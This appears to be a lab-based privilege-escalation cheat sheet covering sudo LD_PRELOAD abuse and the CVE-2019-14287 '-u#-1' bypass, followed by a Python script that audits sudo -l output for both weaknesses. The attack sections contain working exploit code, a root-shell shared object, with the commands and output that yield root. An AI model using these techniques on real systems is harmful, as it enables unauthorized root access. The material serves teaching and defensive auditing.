Run Sudo

LD_PRELOAD

If sudo keeps LD_PRELOAD in the environment for the compromised user (shown as env_keep+=LD_PRELOAD under "Matching Defaults entries" in sudo -l), the following technique escalates privileges, because the dynamic loader will load our shared object into any command the user is allowed to run as root.

TCM@debian:~$ sudo -l
Matching Defaults entries for TCM on this host:
    env_reset, env_keep+=LD_PRELOAD

User TCM may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

Save the following code as shell.c.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the loader maps this object (built with -nostartfiles). */
void _init() {
        unsetenv("LD_PRELOAD");   /* avoid re-injecting into the child shell */
        setgid(0);
        setuid(0);
        system("/bin/bash");
}

Compile it as a shared object, then run one of the permitted commands under sudo with LD_PRELOAD pointing at it.

TCM@debian:~$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
TCM@debian:~$ sudo LD_PRELOAD=/home/user/shell.so apache2
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

!ROOT CVE-2019-14287

If you check permissions with sudo -l and you notice the following:

tryhackme@sudo-privesc:~$ sudo -l
Matching Defaults entries for tryhackme on sudo-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tryhackme may run the following commands on sudo-privesc:
    (ALL, !root) NOPASSWD: /bin/bash <-----

Use the following command to pop a root shell. The "-1" (or 4294967295) is an invalid UID that affected sudo versions (before 1.8.28) treat as UID 0, which is why the "!root" exclusion does not apply. We can take over any other user on the system by replacing "-1" with that user's UID.

tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)
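From the defender's side, both findings on this page can be picked out of sudo -l output automatically. The following audit script is an added example (not part of the original page): it parses a constructed sample built from the two listings above, flags env_keep entries that preserve loader variables, and flags "!root" runas exclusions when the reported sudo version is older than 1.8.28, the release that fixed CVE-2019-14287.

```python
import re
from typing import List, Tuple

# Constructed sample (not real host output): the two `sudo -l` results above, concatenated.
SAMPLE_SUDO_L = """\
Matching Defaults entries for TCM on this host:
    env_reset, env_keep+=LD_PRELOAD

User TCM may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
Matching Defaults entries for tryhackme on sudo-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin

User tryhackme may run the following commands on sudo-privesc:
    (ALL, !root) NOPASSWD: /bin/bash
"""

# Loader variables that env_keep must never preserve: they let the caller
# inject a shared object into any command sudo runs as root.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH")
# "(runas) [TAG: ...] command" lines as printed by `sudo -l`.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(?:[A-Z]+:\s*)*(\S.*)$")

def version_lt(version: str, fixed: Tuple[int, ...]) -> bool:
    """True if a sudo version string such as '1.8.27p1' is older than `fixed`."""
    parts = tuple(int(n) for n in re.findall(r"\d+", version)[:3])
    return parts < fixed

def audit_sudo_l(text: str, sudo_version: str) -> List[str]:
    """Return one finding per misconfiguration discussed on this page."""
    findings = []
    for line in text.splitlines():
        if "env_keep" in line:
            for var in LOADER_VARS:
                if var in line:
                    findings.append(f"env_keep preserves {var}: remove it from env_keep "
                                    f"(env_reset alone is defeated)")
        m = RULE_RE.match(line)
        if m and "!root" in m.group(1).replace(" ", ""):
            if version_lt(sudo_version, (1, 8, 28)):
                findings.append(f"runas '({m.group(1)})' for {m.group(2)}: the !root exclusion "
                                f"is bypassable on sudo < 1.8.28 (CVE-2019-14287); upgrade sudo")
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L, "1.8.27p1"):
        print(finding)
```

Feed it `sudo -l` output collected from a host together with `sudo -V | head -1`; an empty result means neither of the two weaknesses is present in the rules that user can see.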
